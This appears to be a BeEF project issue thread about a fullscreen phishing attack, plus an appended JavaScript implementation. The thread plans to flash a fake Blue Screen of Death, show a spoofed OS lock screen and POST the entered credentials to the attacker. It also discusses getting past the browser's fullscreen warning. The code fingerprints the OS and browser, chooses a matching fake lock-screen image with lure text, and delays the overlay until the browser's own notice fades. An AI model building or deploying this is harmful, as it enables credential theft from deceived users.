I have been trying to code this but I'm terrible with ActionScript. Consider this:
The full screen executes, the user is told to hit Escape to exit fullscreen, and as that message fades a Blue Screen of Death flickers and you're logged out. You should log back in. BSoD! Crap! Is my work safe?!
What just happened was the SWF (and BeEF?) made an educated guess at your OS and loaded the images for an identical login screen for your operating system. The username and password are POSTed back to the attacker/BeEF.
I'm not sure if it could go as far as getting the username, but that would be great too.
If the attack is successful you will obtain the current user's credentials to further your attack, and the AV doesn't need to know about any of this as it's just asking you to submit your user and password.
As I said before, I'm terrible at ActionScript, but I know that SWF will do a nice fullscreen. It might be nice to deploy as an EXE too (or .app, depending on how good the fingerprinting can get), and use educated guesses on default user icons etc.
I'd love to see this, would you?
I like this idea.
The Windows logon page probably won't have to be too accurate if the users want to save their work.
We might have to use something generic on the login page, like "Administrator" or "System Recovery" for the username. A "Restore your work" message might help.
It may be possible to get the username if Flash can read environment variables or local file system paths (either directly or indirectly by catching error messages)?
I have been having a look at retrieving the username via environment variables, but I think your idea of catching an error message is a great one.
It would be nice if there were an ActionScript ninja among us; I can only help with the initial idea and creating the supporting graphics (unless you could have local file access via Flash, then you could load most default backgrounds and icons up via that).
But the error catching sounds great, I can't wait to see how this pans out :)
Just had an interesting chat with a colleague, and this attack could dip into application-layer credential stealing too... modular perhaps,
such as http://4.bp.blogspot.com/-hBANnl3V4Pc/Tce_z7OHScI/AAAAAAAAAEM/Hp-GOVrcAnM/s1600/auth-failed.PNG
From the Security Considerations section of https://www.adobe.com/devnet/flashplayer/articles/full_screen_mode.html
An overlay dialog box will appear when the movie enters full-screen mode, instructing the user how to exit and return to normal mode. The dialog box appears for a few seconds and then fades out.
Users cannot enter text in text input fields while in full-screen mode. All keyboard input and key-related ActionScript is disabled while in full-screen mode, with the exception of the keyboard shortcuts that take the viewer out of full-screen mode.
I'm not sure if it's possible to get around this. Maybe we could use Java or HTML5?
Firefox 15 allows fullscreen, but it shows a big error message to inform the user that the fullscreen was triggered by the website. So I don't know if it's really exploitable.
Any tests with Chrome/Safari?
Have a look at this: http://feross.org/html5-fullscreen-api-attack/ and https://github.com/feross/fullscreen-api-attack
I saw that ;) thanks.
Anyone want to have a look at it and eventually port it to BeEF?
Issue #702 is now assigned to you xntrik. Milestone: 0.4.3.9-alpha
Firefox shows a big notification while the Chrome notification is really discreet. I've taken screenshots here and here.
The point is that you will have to detect the browser and OS of the user and create a relevant picture, and many details can't be adapted (bookmarks, username...). So I doubt it will be effective in most cases. But it would be good to have a first version in BeEF :)
Okies, this issue has gone through a number of iterations, and now we seem to be happy with http://feross.org/html5-fullscreen-api-attack/
The problem though, as rightly pointed out by Nbblrr, is that this requires an image of the spoofed site to be created in advance (although I don't understand why the spoofed content can't just be actual content instead of an image?).
I can see, potentially, that this module might be more useful as a PoC, but actually using it, at least in its current state, would be pretty darn difficult.
OH! you want to spoof the login page... right...
Mental note to self, to capture a screenshot of my lock screen I need to http://apple.stackexchange.com/questions/21094/lock-screen-screenshots and http://superuser.com/questions/103310/screen-capture-in-mac-is-all-black
I can then cut it up and recreate a 'phish' of that with a 'password' dialog.
Most browsers implement a "Now entering fullscreen mode" warning. It might be useful to add a 'wait time' option, similar to tabnabbing. Does this 'attack' have a name yet? I nominate 'screen nabbing'.
Nah, you can't send fullscreen behind. I think fullscreen will fail silently if the current tab is not active.
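The pieces the thread keeps circling back to, as an added example that is neither BeEF code nor the feross PoC: guessing OS and browser from the User-Agent so a matching lock-screen image can be chosen, looking up the vendor-prefixed HTML5 Fullscreen API, and only drawing the overlay once the document confirms it actually entered fullscreen (the request needs a user gesture and an active tab, and otherwise fails with no visible error). The User-Agent strings, template image names and the "Administrator" / "Restore your work" text are constructed placeholders; the 'wait time' delay mirrors the option suggested above. The browser's own "now fullscreen" notification is drawn outside the page and cannot be suppressed from script.

```javascript
// Added example for this thread (not BeEF code, not the feross PoC).
// Pure functions run under Node; the DOM wiring is guarded so the same
// file also loads in a browser.

// 1. Guess OS and browser from the User-Agent. Order matters: Chrome's
//    UA also contains "Safari/", so Chrome is tested first.
function detectPlatform(ua) {
  let os = 'unknown';
  if (/Windows NT/.test(ua)) os = 'windows';
  else if (/Mac OS X/.test(ua) && !/iPhone|iPad/.test(ua)) os = 'macos';
  else if (/Linux/.test(ua)) os = 'linux';

  let browser = 'unknown';
  if (/Firefox\//.test(ua)) browser = 'firefox';
  else if (/Chrome\//.test(ua)) browser = 'chrome';
  else if (/Safari\//.test(ua)) browser = 'safari';
  return { os, browser };
}

// 2. One pre-rendered lock-screen image per OS (placeholder file names).
//    The account name and prompt are generic on purpose: the real
//    username cannot be fingerprinted from JavaScript.
const TEMPLATES = {
  windows: { image: 'lock-windows.png', user: 'Administrator', prompt: 'Restore your work' },
  macos:   { image: 'lock-macos.png',   user: 'Administrator', prompt: 'Restore your work' },
  linux:   { image: 'lock-generic.png', user: 'Administrator', prompt: 'Restore your work' },
  unknown: { image: 'lock-generic.png', user: 'Administrator', prompt: 'Restore your work' },
};
function chooseTemplate(ua) {
  return TEMPLATES[detectPlatform(ua).os];
}

// 3. Vendor-prefixed Fullscreen API lookup; null when the API is absent
//    (e.g. under Node, or a browser without fullscreen support).
const REQUEST_NAMES = ['requestFullscreen', 'mozRequestFullScreen',
                       'webkitRequestFullscreen', 'msRequestFullscreen'];
function fullscreenMethod(el) {
  return REQUEST_NAMES.find((n) => typeof el[n] === 'function') || null;
}
function fullscreenElement(doc) {
  return doc.fullscreenElement || doc.mozFullScreenElement ||
         doc.webkitFullscreenElement || doc.msFullscreenElement || null;
}

// 4. Browser-only wiring. Fullscreen may only be requested from a user
//    gesture, so it hangs off a click. The request fails when the tab is
//    not active or the gesture is missing (silently in older engines, via
//    a rejected promise in newer ones), so the overlay is drawn only after
//    the document reports the element as fullscreen, and then after
//    waitMs so the browser's own notification has faded.
function arm(el, ua, waitMs) {
  const method = fullscreenMethod(el);
  if (!method) return false;
  el.addEventListener('click', () => {
    const tpl = chooseTemplate(ua);
    const result = el[method]();
    const onEntered = () => {
      if (fullscreenElement(el.ownerDocument) !== el) return; // request failed
      setTimeout(() => {
        el.style.cssText = 'background:#000 url(' + tpl.image + ') center/cover;color:#fff';
        el.textContent = tpl.user + ' - ' + tpl.prompt;
      }, waitMs);
    };
    if (result && typeof result.then === 'function') result.then(onEntered, () => {});
    else setTimeout(onEntered, 100);
  });
  return true;
}

// Constructed User-Agent strings for a quick offline check.
const UA_WIN_FIREFOX = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0';
const UA_MAC_CHROME  = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11';
const UA_MAC_SAFARI  = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2';
const UA_LINUX_CHROME = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1';

if (typeof document !== 'undefined') {
  arm(document.body, navigator.userAgent, 2000);
}
```

Under Node only the detection and API-lookup functions are exercised; in a browser the file arms `document.body` and waits for a click, after which `fullscreenElement()` decides whether anything is drawn at all.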
@Xntrik still keen to implement this functionality?